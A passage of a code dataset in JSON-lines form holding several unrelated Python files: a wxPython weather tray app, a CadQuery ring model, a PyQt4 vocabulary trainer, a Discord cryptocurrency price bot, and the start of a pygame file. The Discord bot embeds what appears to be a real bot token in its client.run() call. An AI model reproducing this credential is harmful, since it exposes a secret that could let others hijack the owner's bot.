try:\r\n loc = \"http://openweathermap.org/img/w/%s.png\"\r\n url = urllib.urlopen(loc % self.data['icon'])\r\n img = wx.ImageFromStream(url, wx.BITMAP_TYPE_PNG)\r\n img = wx.BitmapFromImage(img)\r\n except:\r\n img = wx.Bitmap('errIcon.png')\r\n icon = wx.IconFromBitmap(img)\r\n self.SetIcon(icon)\r\n\r\n def CreatePopupMenu(self):\r\n menu = wx.Menu()\r\n \r\n data = (self.city, \r\n \"Weather: %s\" % self.data['desc'], \r\n \"Temp: %s C\" % self.data['temp'])\r\n for d in data:\r\n item = menu.Append(wx.ID_ANY, d)\r\n item.Enable(False)\r\n\r\n menu.AppendSeparator()\r\n menu.Append(ID_GET_CITY, \"Enter city name...\")\r\n menu.AppendSeparator()\r\n menu.Append(wx.ID_CLOSE)\r\n return menu\r\n\r\n def OnMenu(self, event):\r\n if event.Id == wx.ID_CLOSE:\r\n self.Destroy()\r\n elif event.Id == ID_GET_CITY:\r\n t = wx.GetTextFromUser(\"Enter City Name (City,Country):\", \r\n default_value=self.city)\r\n if t:\r\n self.UpdateData(t)\r\n else:\r\n event.Skip()\r\n\r\nclass WeatherTrayApp(wx.App):\r\n def OnInit(self):\r\n self._trayIcon = WeatherTray()\r\n return True\r\n\r\nif __name__ == \"__main__\":\r\n app = WeatherTrayApp(False)\r\n app.MainLoop()\r\n ", "repo_name": "cubu/wxPython-Application-Development-Cookbook", "sub_path": "Chapter 4/08/sysTrayApp.py", "file_name": "sysTrayApp.py", "file_ext": "py", "file_size_in_byte": 2525, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 3, "dataset": "github-code", "pt": "31", "api": [{"api_name": "wx.NewId", "line_number": 8, "usage_type": "call"}, {"api_name": "wx.TaskBarIcon", "line_number": 10, "usage_type": "attribute"}, {"api_name": "wx.EVT_MENU", "line_number": 15, "usage_type": "attribute"}, {"api_name": "urllib.urlopen", "line_number": 21, "usage_type": "call"}, {"api_name": "json.load", "line_number": 22, "usage_type": "call"}, {"api_name": "urllib.urlopen", "line_number": 41, "usage_type": "call"}, {"api_name": "wx.ImageFromStream", "line_number": 42, "usage_type": "call"}, {"api_name": "wx.BITMAP_TYPE_PNG", "line_number": 42, "usage_type": "attribute"}, {"api_name": "wx.BitmapFromImage", "line_number": 43, "usage_type": "call"}, {"api_name": "wx.Bitmap", "line_number": 45, "usage_type": "call"}, {"api_name": "wx.IconFromBitmap", "line_number": 46, "usage_type": "call"}, {"api_name": "wx.Menu", "line_number": 50, "usage_type": "call"}, {"api_name": "wx.ID_ANY", "line_number": 56, "usage_type": "attribute"}, {"api_name": "wx.ID_CLOSE", "line_number": 62, "usage_type": "attribute"}, {"api_name": "wx.ID_CLOSE", 
"line_number": 66, "usage_type": "attribute"}, {"api_name": "wx.GetTextFromUser", "line_number": 69, "usage_type": "call"}, {"api_name": "wx.App", "line_number": 76, "usage_type": "attribute"}]}
+{"seq_id": "29460816112", "text": "import cadquery as cq\nfrom . import Base\nfrom cadqueryhelper import shape\nfrom cqterrain import Ladder\n\nclass Ring(Base):\n def __init__(self):\n super().__init__()\n self.cut_diameter = 76\n self.diameter = self.cut_diameter + 10\n self.inset = 5\n self.height = 10\n\n self.render_ladders = True\n self.ladder_height = 71\n self.ladder_length = 25\n self.ladder_width = 10\n self.ladder_cut_padding = 1.5\n self.ladder_cut_chamfer = 2\n\n self.ring = None\n self.cut_ladders = None\n self.ladders = None\n self.cut_ring = None\n\n def __make_ring(self):\n ring = shape.cone(\n radius=self.diameter/2,\n radius_top=self.diameter/2-self.inset,\n height=self.height\n )\n\n cut_ring = (\n cq.Workplane(\"XY\")\n .cylinder(self.ladder_height, self.cut_diameter/2)\n )\n\n ring_slice = (cq.Workplane(\"XY\").box(10,.5,self.height))\n\n self.cut_ring = cut_ring.translate((0,0,self.ladder_height/2))\n self.ring = (\n ring.cut(cut_ring)\n .translate((0,0,self.height/2))\n .cut(ring_slice.translate((self.diameter/2-.1,0,self.height/2)))\n )\n\n def __make_cut_ladders(self):\n x_translate = self.cut_diameter/2+self.ladder_length/2+self.ladder_cut_padding\n cut_ladder = (\n cq.Workplane(\"XY\")\n .box(self.ladder_length,self.ladder_length,self.height)\n .faces(\"X or -X\")\n .edges(\"Z\")\n .chamfer(self.ladder_cut_chamfer)\n .translate((\n 0,\n x_translate,\n self.height/2\n ))\n )\n\n cut_ladders = (\n cq.Workplane(\"XY\")\n .union(cut_ladder)\n .union(cut_ladder.rotate((0,0,1),(0,0,0),180))\n )\n self.cut_ladders = cut_ladders\n\n def __make_ladder(self):\n bp = Ladder()\n bp.length = self.ladder_length\n bp.width = self.ladder_width\n bp.height = self.ladder_height\n bp.make()\n bp.rungs = bp.rungs.translate((0,self.ladder_width/4,0))\n\n ladder = bp.build()\n\n ladder = ladder.translate((\n 0,\n self.cut_diameter/2+.6,\n self.ladder_height/2\n )).cut(self.cut_ring)\n\n ladders = (\n cq.Workplane()\n .union(ladder)\n .union(ladder.rotate((0,0,1),(0,0,0),180))\n )\n\n #show_object(ladders)\n\n self.ladders = ladders\n\n def make(self):\n super().make()\n self.__make_ring()\n\n if self.render_ladders:\n self.__make_cut_ladders()\n self.__make_ladder()\n\n def build(self):\n super().build()\n scene = (\n cq.Workplane(\"XY\")\n .union(self.ring)\n )\n\n if self.render_ladders and self.ladders:\n scene = (\n scene\n .cut(self.cut_ladders)\n .add(self.ladders)\n )\n return scene\n", "repo_name": "medicationforall/cqindustry", "sub_path": "src/cqindustry/Ring.py", "file_name": "Ring.py", "file_ext": "py", "file_size_in_byte": 3063, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "31", "api": [{"api_name": "cadqueryhelper.shape.cone", "line_number": 27, "usage_type": "call"}, {"api_name": "cadqueryhelper.shape", "line_number": 27, "usage_type": "name"}, {"api_name": "cadquery.Workplane", "line_number": 34, "usage_type": "call"}, {"api_name": "cadquery.Workplane", "line_number": 38, "usage_type": "call"}, {"api_name": "cadquery.Workplane", "line_number": 50, "usage_type": "call"}, {"api_name": "cadquery.Workplane", "line_number": 63, "usage_type": "call"}, {"api_name": "cqterrain.Ladder", "line_number": 70, "usage_type": "call"}, {"api_name": "cadquery.Workplane", "line_number": 86, "usage_type": "call"}, {"api_name": "cadquery.Workplane", "line_number": 106, "usage_type": "call"}]}
+{"seq_id": "9650187284", "text": "#!usr/bin/python\n### coding: utf-8\n#__author__ = 'Przemyslaw Teodorski'\n\nimport sys\nfrom functools import partial\nfrom PyQt4 import QtGui\nfrom databaseObjects import Word, Answer\nfrom model import Interface\n\n\nclass MainWindowOld(QtGui.QMainWindow):\n\n #languages = {1: }\n\n spanishButtonLabel = str('Español')\n spanishSpecialCharacters = ['ñ', 'ó', 'á', 'ú', 'é', 'í']\n mode = {'es', 'en'}\n\n englishButtonLabel = str('English')\n\n def __init__(self):\n super(MainWindowOld, self).__init__()\n\n def initUI(self, onAddWordModel, closeConnection, onStartTestModel, onCheckAnswerModel,\n onNextTestWordModel, onContinueWithTest):\n\n self.onAddWordModel = onAddWordModel\n self.closeConnection = closeConnection\n self.onStartTestModel = onStartTestModel\n self.onCheckAnswerModel = onCheckAnswerModel\n self.onNextTestWordModel = onNextTestWordModel\n self.continueWithTest = onContinueWithTest\n\n self.spanishButton = QtGui.QPushButton(self.spanishButtonLabel)\n self.spanishButton.clicked.connect(self.onSpanishDict)\n\n self.englishButton = QtGui.QPushButton(self.englishButtonLabel)\n self.englishButton.clicked.connect(self.onEnglishDict)\n\n self.mainWidget = QtGui.QWidget()\n mainLayout = QtGui.QGridLayout()\n mainLayout.addWidget(self.spanishButton, 0,0,2,1)\n mainLayout.addWidget(self.englishButton, 1,0,2,1)\n self.mainWidget.setLayout(mainLayout)\n\n self.setCentralWidget(self.mainWidget)\n self.setGeometry(200, 200, 600, 500)\n self.setWindowTitle('Words Memory')\n self.show()\n\n def onSpanishDict(self):\n self.languageMode = 1\n self.addWordButton = QtGui.QPushButton('Añadir una palabra')\n self.addWordButton.clicked.connect(self.onAddWordWindow)\n\n self.startTestButton = QtGui.QPushButton('Empezar test')\n self.startTestButton.clicked.connect(self.onStartTest)\n\n subWidget = QtGui.QWidget()\n newLayout = QtGui.QGridLayout()\n newLayout.addWidget(self.addWordButton, 0,0,2,1)\n newLayout.addWidget(self.startTestButton, 1,0,2,1)\n subWidget.setLayout(newLayout)\n\n self.setCentralWidget(subWidget)\n\n def onEnglishDict(self):\n self.languageMode = 2\n self.addWordButton = QtGui.QPushButton('Add new word')\n self.addWordButton.clicked.connect(self.onAddWordWindow)\n\n self.startTestButton = QtGui.QPushButton('Start test')\n self.startTestButton.clicked.connect(self.onStartTest)\n\n subWidget = QtGui.QWidget()\n newLayout = QtGui.QGridLayout()\n newLayout.addWidget(self.addWordButton, 0,0,2,1)\n newLayout.addWidget(self.startTestButton, 1,0,2,1)\n subWidget.setLayout(newLayout)\n\n self.setCentralWidget(subWidget)\n\n def swapToSpanishCharacters(self, text):\n if len(text):\n root = str(text)[0:-1]\n l = str(text)[-1]\n if l == 'ń':\n self.newWordLine.setText(root + 'ñ')\n elif l == 'ó':\n self.newWordLine.setText(root + 'ó')\n elif l == 'ą':\n self.newWordLine.setText(root + 'á')\n elif l == 'ę':\n self.newWordLine.setText(root + 'é')\n\n\n def onAddWordWindow(self):\n self.newWordLine = QtGui.QLineEdit()\n #connect newWordLine with spanish characters\n self.newWordLine.textEdited.connect(self.swapToSpanishCharacters)\n\n self.translation = QtGui.QLineEdit()\n self.enTranslation = QtGui.QLineEdit()\n self.comment = QtGui.QPlainTextEdit()\n\n wordLabel = QtGui.QLabel('Palabra')\n translationLabel = QtGui.QLabel('Traslación polaco')\n enTranslationLabel = QtGui.QLabel('Traslación ingles')\n commentLabel = QtGui.QLabel('Comentario')\n\n self.acceptButton = QtGui.QPushButton('Ok')\n self.acceptButton.clicked.connect(self.onAcceptNewWord)\n\n 
self.cancelButton = QtGui.QPushButton('Cancel')\n self.cancelButton.clicked.connect(self.onCancelAddWord)\n\n layout = QtGui.QGridLayout()\n layout.addWidget(self.getWidgetSpecialLetters(), 0, 0, 1, 2)\n layout.addWidget(wordLabel, 1, 0, 1, 1)\n layout.addWidget(self.newWordLine, 1, 1, 1, 2)\n layout.addWidget(translationLabel, 2, 0, 1, 1)\n layout.addWidget(self.translation, 2, 1, 1, 2)\n\n layout.addWidget(enTranslationLabel, 3, 0, 1, 1)\n layout.addWidget(self.enTranslation, 3, 1, 1, 2)\n\n layout.addWidget(commentLabel, 4, 0, 1, 1)\n layout.addWidget(self.comment, 4, 1, 1, 2)\n\n layout.addWidget(self.acceptButton, 5, 0, 1, 1)\n layout.addWidget(self.cancelButton, 6, 0, 1, 1)\n\n subWidget = QtGui.QWidget()\n subWidget.setLayout(layout)\n self.setCentralWidget(subWidget)\n\n def getWidgetSpecialLetters(self):\n if self.languageMode == 1:\n #spanish dictionary\n buttonWidget = QtGui.QWidget()\n layout = QtGui.QHBoxLayout()\n for i in self.spanishSpecialCharacters:\n b = QtGui.QPushButton(str(i))\n t = b.text()\n b.clicked.connect(partial(self.onSpecialCharacterClicked, t))\n layout.addWidget(b)\n buttonWidget.setLayout(layout)\n return buttonWidget\n\n else :\n pass\n\n def onSpecialCharacterClicked(self, other):\n text = self.newWordLine.text()\n text += other\n self.newWordLine.setText(text)\n\n def checkAnswer(self):\n a = str(self.translation.text())\n self.onCheckAnswerModel(a)\n\n def onStartTest(self):\n self.onStartTestModel(self.languageMode)\n\n def showTestView(self):\n self.newWordLine = QtGui.QLabel()\n\n self.translation = QtGui.QLineEdit()\n self.enTranslation = QtGui.QLineEdit()\n\n self.correctPLTranslation = QtGui.QLineEdit()\n self.correctPLTranslation.setReadOnly(True)\n self.correctPLTranslation.hide()\n\n self.comment = QtGui.QPlainTextEdit()\n self.comment.hide()\n\n wordLabel = QtGui.QLabel('Palabra')\n translationLabel = QtGui.QLabel('Traslación polaco')\n enTranslationLabel = QtGui.QLabel('Traslación ingles')\n commentLabel = QtGui.QLabel('Comentario')\n\n self.nextButton = QtGui.QPushButton('Siguiente')\n self.nextButton.clicked.connect(self.onNextTestWordModel)\n\n self.acceptButton = QtGui.QPushButton('Ok')\n self.acceptButton.clicked.connect(self.checkAnswer)\n\n self.cancelButton = QtGui.QPushButton('Cancelar')\n self.cancelButton.clicked.connect(self.onCancelAddWord)\n\n layout = QtGui.QGridLayout()\n layout.addWidget(self.getWidgetSpecialLetters(), 0, 0, 1, 2)\n layout.addWidget(wordLabel, 2, 0, 1, 1)\n layout.addWidget(self.newWordLine, 2, 1, 1, 1)\n\n layout.addWidget(translationLabel, 3, 0, 1, 1)\n layout.addWidget(self.translation, 3, 1, 1, 1)\n layout.addWidget(self.correctPLTranslation, 4, 1, 1, 1)\n\n layout.addWidget(enTranslationLabel, 5, 0, 1, 1)\n layout.addWidget(self.enTranslation, 5, 1, 1, 1)\n\n layout.addWidget(commentLabel, 6, 0, 1, 1)\n layout.addWidget(self.comment, 6, 1, 1, 2)\n\n layout.addWidget(self.nextButton, 7, 0, 1, 1)\n layout.addWidget(self.acceptButton, 7, 1, 1, 1)\n layout.addWidget(self.cancelButton, 8, 0, 1, 1)\n\n subWidget = QtGui.QWidget()\n subWidget.setLayout(layout)\n self.setCentralWidget(subWidget)\n\n def windowContinue(self):\n label = ('Continuar con las palabras que no supiste?')\n ret = QtGui.QMessageBox.question(self, 'Atención', label, QtGui.QMessageBox.Cancel | QtGui.QMessageBox.Ok,\n QtGui.QMessageBox.Ok)\n if ret == QtGui.QMessageBox.Ok:\n self.continueWithTest()\n\n def congratulations(self):\n pass\n\n def onCancelAddWord(self):\n if self.languageMode == 1:\n self.onSpanishDict()\n else:\n pass\n\n def 
clearFields(self):\n        self.translation.setText('')\n        self.enTranslation.setText('')\n        self.newWordLine.setText('')\n        self.comment.setPlainText('')  # QPlainTextEdit has no setText()\n\n    def onAcceptNewWord(self):\n        print('accept ui')\n        newWord = str(self.newWordLine.text())\n        polishTranslation = str(self.translation.text())\n        englishTranslation = str(self.enTranslation.text())\n        comment = str(self.comment.toPlainText())\n        w = Word(self.languageMode, newWord, polishTranslation, englishTranslation, comment=comment)\n        self.onAddWordModel(w)\n        self.clearFields()\n\n    def validateNewWord(self):\n        # text() never returns None, so check for empty strings instead\n        if not str(self.newWordLine.text()):\n            return False\n        elif not str(self.translation.text()):\n            return False\n        return True\n\n    def closeEvent(self, event):\n        self.closeConnection()\n        event.accept()\n        print('after close event')\n\n\ndef main():\n    app = QtGui.QApplication(sys.argv)\n    ui = MainWindowOld()\n    interface = Interface(ui)\n    #ui.initUI()\n    sys.exit(app.exec_())\n\nif __name__ == '__main__':\n    main()", "repo_name": "przemek1899/wordsMemory_Desktop_pyqt4", "sub_path": "mainWindowOld.py", "file_name": "mainWindowOld.py", "file_ext": "py", "file_size_in_byte": 9193, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "PyQt4.QtGui.QMainWindow", "line_number": 12, "usage_type": "attribute"}, {"api_name": "PyQt4.QtGui", "line_number": 12, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QPushButton", "line_number": 35, "usage_type": "call"}, {"api_name": "PyQt4.QtGui", "line_number": 35, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QPushButton", "line_number": 38, "usage_type": "call"}, {"api_name": "PyQt4.QtGui", "line_number": 38, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QWidget", "line_number": 41, "usage_type": "call"}, {"api_name": "PyQt4.QtGui", "line_number": 41, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QGridLayout", "line_number": 42, "usage_type": "call"}, {"api_name": "PyQt4.QtGui", "line_number": 42, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QPushButton", "line_number": 54, "usage_type": "call"}, {"api_name": "PyQt4.QtGui", "line_number": 54, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QPushButton", "line_number": 57, "usage_type": "call"}, {"api_name": "PyQt4.QtGui", "line_number": 57, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QWidget", "line_number": 60, "usage_type": "call"}, {"api_name": "PyQt4.QtGui", "line_number": 60, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QGridLayout", "line_number": 61, "usage_type": "call"}, {"api_name": "PyQt4.QtGui", "line_number": 61, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QPushButton", "line_number": 70, "usage_type": "call"}, {"api_name": "PyQt4.QtGui", "line_number": 70, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QPushButton", "line_number": 73, "usage_type": "call"}, {"api_name": "PyQt4.QtGui", "line_number": 73, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QWidget", "line_number": 76, "usage_type": "call"}, {"api_name": "PyQt4.QtGui", "line_number": 76, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QGridLayout", "line_number": 77, "usage_type": "call"}, {"api_name": "PyQt4.QtGui", "line_number": 77, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QLineEdit", "line_number": 99, "usage_type": "call"}, {"api_name": "PyQt4.QtGui", "line_number": 99, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QLineEdit", "line_number": 
104, "usage_type": "call"}, {"api_name": "PyQt4.QtGui", "line_number": 104, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QPlainTextEdit", "line_number": 105, "usage_type": "call"}, {"api_name": "PyQt4.QtGui", "line_number": 105, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QLabel", "line_number": 107, "usage_type": "call"}, {"api_name": "PyQt4.QtGui", "line_number": 107, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QLabel", "line_number": 108, "usage_type": "call"}, {"api_name": "PyQt4.QtGui", "line_number": 108, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QLabel", "line_number": 109, "usage_type": "call"}, {"api_name": "PyQt4.QtGui", "line_number": 109, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QLabel", "line_number": 110, "usage_type": "call"}, {"api_name": "PyQt4.QtGui", "line_number": 110, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QPushButton", "line_number": 112, "usage_type": "call"}, {"api_name": "PyQt4.QtGui", "line_number": 112, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QPushButton", "line_number": 115, "usage_type": "call"}, {"api_name": "PyQt4.QtGui", "line_number": 115, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QGridLayout", "line_number": 118, "usage_type": "call"}, {"api_name": "PyQt4.QtGui", "line_number": 118, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QWidget", "line_number": 134, "usage_type": "call"}, {"api_name": "PyQt4.QtGui", "line_number": 134, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QWidget", "line_number": 141, "usage_type": "call"}, {"api_name": "PyQt4.QtGui", "line_number": 141, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QHBoxLayout", "line_number": 142, "usage_type": "call"}, {"api_name": "PyQt4.QtGui", "line_number": 142, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QPushButton", "line_number": 144, "usage_type": "call"}, {"api_name": "PyQt4.QtGui", "line_number": 144, "usage_type": "name"}, {"api_name": "functools.partial", "line_number": 146, "usage_type": "call"}, {"api_name": "PyQt4.QtGui.QLabel", "line_number": 167, "usage_type": "call"}, {"api_name": "PyQt4.QtGui", "line_number": 167, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QLineEdit", "line_number": 169, "usage_type": "call"}, {"api_name": "PyQt4.QtGui", "line_number": 169, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QLineEdit", "line_number": 170, "usage_type": "call"}, {"api_name": "PyQt4.QtGui", "line_number": 170, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QLineEdit", "line_number": 172, "usage_type": "call"}, {"api_name": "PyQt4.QtGui", "line_number": 172, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QPlainTextEdit", "line_number": 176, "usage_type": "call"}, {"api_name": "PyQt4.QtGui", "line_number": 176, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QLabel", "line_number": 179, "usage_type": "call"}, {"api_name": "PyQt4.QtGui", "line_number": 179, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QLabel", "line_number": 180, "usage_type": "call"}, {"api_name": "PyQt4.QtGui", "line_number": 180, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QLabel", "line_number": 181, "usage_type": "call"}, {"api_name": "PyQt4.QtGui", "line_number": 181, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QLabel", "line_number": 182, "usage_type": "call"}, {"api_name": "PyQt4.QtGui", "line_number": 182, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QPushButton", "line_number": 184, "usage_type": "call"}, {"api_name": "PyQt4.QtGui", "line_number": 184, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QPushButton", 
"line_number": 187, "usage_type": "call"}, {"api_name": "PyQt4.QtGui", "line_number": 187, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QPushButton", "line_number": 190, "usage_type": "call"}, {"api_name": "PyQt4.QtGui", "line_number": 190, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QGridLayout", "line_number": 193, "usage_type": "call"}, {"api_name": "PyQt4.QtGui", "line_number": 193, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QWidget", "line_number": 212, "usage_type": "call"}, {"api_name": "PyQt4.QtGui", "line_number": 212, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QMessageBox.question", "line_number": 218, "usage_type": "call"}, {"api_name": "PyQt4.QtGui.QMessageBox", "line_number": 218, "usage_type": "attribute"}, {"api_name": "PyQt4.QtGui", "line_number": 218, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QMessageBox", "line_number": 219, "usage_type": "attribute"}, {"api_name": "PyQt4.QtGui", "line_number": 219, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QMessageBox", "line_number": 220, "usage_type": "attribute"}, {"api_name": "PyQt4.QtGui", "line_number": 220, "usage_type": "name"}, {"api_name": "databaseObjects.Word", "line_number": 244, "usage_type": "call"}, {"api_name": "PyQt4.QtGui.QApplication", "line_number": 261, "usage_type": "call"}, {"api_name": "PyQt4.QtGui", "line_number": 261, "usage_type": "name"}, {"api_name": "sys.argv", "line_number": 261, "usage_type": "attribute"}, {"api_name": "model.Interface", "line_number": 263, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 265, "usage_type": "call"}]}
+{"seq_id": "20314321154", "text": "#!/usr/bin/env python3\n\nimport discord\nfrom discord.ext.commands import Bot\nfrom discord.ext import commands\nimport asyncio\nimport time\nimport io\nimport json\n\n\nClient = discord.Client()\nclient = commands.Bot(command_prefix = \"$\")\n\n\n@client.event\nasync def on_ready():\n print(\"Bot is online and connected to Discord\")\n\n\n@client.event\nasync def on_message(message):\n\tif message.content.upper().startswith('$'):\n\t\targs = message.content.split(\" \")\n\t\ttry:\n\t\t\tprint(args[0] + args[1])\n\t\t\tcoinShort, coinAmount, coinLong, coinPriceUSD, coinPriceBTC, coinValueUSD, coinValueBTC = getPrice(args)\n\t\t\tembed = discord.Embed(title=coinLong + ' (' + coinShort + ')', description= str(coinAmount) + ' ' + str(coinLong) + ' is worth: $' + str(coinValueUSD) + ' or ₿' + str(coinValueBTC), color=0x00ff00)\n\t\t\tawait client.send_message(message.channel, embed=embed)\n\t\texcept:\n\t\t\tcoinLong, coinShort, coinRank, coinMarketcap, coinPriceUSD, coinPriceBTC, coinVolume, coinChange1h, coinChange1d, coinChange7d = getTicker(str(message.content).replace('$','').upper())\n\t\t\tembed = discord.Embed(title=coinLong + ' (' + coinShort + ')', description= '**Rank: **' + str(coinRank) + '\\n' + '**Marketcap: **' + str(coinMarketcap) + '\\n' + '**Volume 24H: **' + str(coinVolume) + '\\n\\n' + '**Price USD: **' + str(coinPriceUSD) + '\\n' + '**Price BTC: **' + str(coinPriceBTC) + '\\n\\n' + '**Change 1 hour: **' + str(coinChange1h) + '\\n' + '**Change 1 day: **' + str(coinChange1d) + '\\n' + '**Change 7 days: **' + str(coinChange7d), color=0x00ff00)\n\t\t\tawait client.send_message(message.channel, embed=embed)\n\ndef getTicker(coin):\n\twith io.open('/home/ExchangeData/APIData.json', 'r', encoding='utf8') as outfile:\n\t\toutfileRead = outfile.read() \n\t\tdict = json.loads(outfileRead)\n\t\ttry:\n\t\t\tcoinLong = dict[coin]['name'].replace('-', ' ')\n\t\t\tcoinShort = dict[coin]['shortname']\n\t\t\tcoinRank = str('#' + str(dict[coin]['rank'])) if dict[coin]['rank'] else '?'\n\t\t\tcoinMarketcap = str('$' + str(\"{:,}\".format(round(float(dict[coin]['marketcap']),0)))).replace('.0','') if dict[coin]['marketcap'] else '?'\n\t\t\tcoinPriceUSD = '$' + dict[coin]['average_price_USD']\n\t\t\tcoinPriceBTC = '₿' + str(round(float(dict[coin]['average_price_BTC']),5)) if float(dict[coin]['average_price_BTC']) > 0.01 else '₿' + str(round(float(dict[coin]['average_price_BTC']),9))\n\t\t\tcoinVolume = '$' + str(\"{:,}\".format(round(float(dict[coin]['total_volume']),2)))\n\t\t\tcoinChange1h = str(round(float(dict[coin]['percent_change_1h_USD']),2))+ '%' if dict[coin]['percent_change_1h_USD'] else '?'\n\t\t\tcoinChange1d = str(round(float(dict[coin]['percent_change_24h_USD']),2))+ '%' if dict[coin]['percent_change_24h_USD'] else '?'\n\t\t\tcoinChange7d = str(round(float(dict[coin]['percent_change_7d_USD']),2))+ '%' if dict[coin]['percent_change_7d_USD'] else '?'\n\t\t\tif coinChange1h != '?':\n\t\t\t\tcoinChange1h = str('▼ ' + coinChange1h) if '-' in dict[coin]['percent_change_1h_USD'] else str('▲ ' + coinChange1h)\n\t\t\tif coinChange1d != '?':\n\t\t\t\tcoinChange1d = str('▼ ' + coinChange1d) if '-' in dict[coin]['percent_change_24h_USD'] else str('▲ ' + coinChange1d)\n\t\t\tif coinChange7d != '?':\n\t\t\t\tcoinChange7d = str('▼ ' + coinChange7d) if '-' in dict[coin]['percent_change_7d_USD'] else str('▲ ' + coinChange7d)\n\t\t\treturn coinLong, coinShort, coinRank, coinMarketcap, coinPriceUSD, coinPriceBTC, coinVolume, coinChange1h, coinChange1d, 
coinChange7d\n\t\texcept Exception as e:\n\t\t\tprint(e)\n\t\t\tmessageToSend = 'Unknown Coin'\n\t\t\treturn messageToSend\n\t\t\ndef getPrice(args):\n\tcoinShort = str(args[0]).replace('$','').upper()\n\tcoinAmount = float(args[1])\n\twith io.open('/home/ExchangeData/APIData.json', 'r', encoding='utf8') as outfile:\n\t\toutfileRead = outfile.read() \n\t\tdict = json.loads(outfileRead)\n\t\tcoinLong = dict[coinShort]['name'].replace('-', ' ')\n\t\tcoinPriceUSD = float(dict[coinShort]['average_price_USD'])\n\t\tcoinPriceBTC = float(dict[coinShort]['average_price_BTC'])\n\tcoinValueUSD = str(round((coinPriceUSD * coinAmount),2))\n\tcoinValueBTC = str(coinPriceBTC * coinAmount)\n\treturn coinShort, coinAmount, coinLong, coinPriceUSD, coinPriceBTC, coinValueUSD, coinValueBTC\n\t\t\n\t\n\nclient.run(\"NDcwMjAwNTExMjk2MTc2MTI4.DjS0EA.JJOk9QeHquRyO95nlaMrz-RCCkI\") #Replace token with your bots token\n\t", "repo_name": "Eddie-The-Eagle/Cryptotracker", "sub_path": "DiscordBot/DiscordBot.py", "file_name": "DiscordBot.py", "file_ext": "py", "file_size_in_byte": 4224, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "discord.Client", "line_number": 12, "usage_type": "call"}, {"api_name": "discord.ext.commands.Bot", "line_number": 13, "usage_type": "call"}, {"api_name": "discord.ext.commands", "line_number": 13, "usage_type": "name"}, {"api_name": "discord.Embed", "line_number": 28, "usage_type": "call"}, {"api_name": "discord.Embed", "line_number": 32, "usage_type": "call"}, {"api_name": "io.open", "line_number": 36, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 38, "usage_type": "call"}, {"api_name": "io.open", "line_number": 65, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 67, "usage_type": "call"}]}
+{"seq_id": "10734157754", "text": "'''\r\nTitle:\r\nAuthor: Nikhil Nayyar\r\nDate Created: 16/05/19\r\n'''\r\nimport pygame, random, time\r\n\r\n### Classes\r\nclass myClass:\r\n\tdef __init__(self, x=0, y=0):\r\n\t\tself.x = x\r\n\t\tself.y = y\r\n\t\tself.pos = (self.x, self.y)\r\n\t\tself.surface = pygame.Surface((0, 0), pygame.SRCALPHA, 32)\r\n\t\tself.red = 0\r\n\t\tself.green = 0\r\n\t\tself.blue = 0\r\n\t\tself.colour = (self.red, self.green, self.blue)\r\n\r\n\tdef getSurface(self): # encapsulation\r\n\t\treturn self.surface\r\n\r\n\tdef getPos(self):\r\n\t\treturn self.pos\r\n\r\n\tdef getX(self):\r\n\t\treturn self.x\r\n\r\n\tdef getY(self):\r\n\t\treturn self.y\r\n\r\n\tdef getWidth(self):\r\n\t\treturn self.width\r\n\r\n\tdef getHeight(self):\r\n\t\treturn self.height\r\n\r\n\tdef setPos(self, pos):\r\n\t\tself.x = pos[0]\r\n\t\tself.y = pos[1]\r\n\t\tself.pos = (self.x, self.y)\r\n\r\n\tdef setColour(self, colour):\r\n\t\tself.colour = colour\r\n\r\n\r\nclass box(myClass):\r\n\tdef __init__(self, width, height, x=0, y=0):\r\n\t\tmyClass.__init__(self, x, y)\r\n\t\tself.width = width\r\n\t\tself.height = height\r\n\t\tself.dim = (self.width, self.height)\r\n\t\tself.surface = pygame.Surface(self.dim, 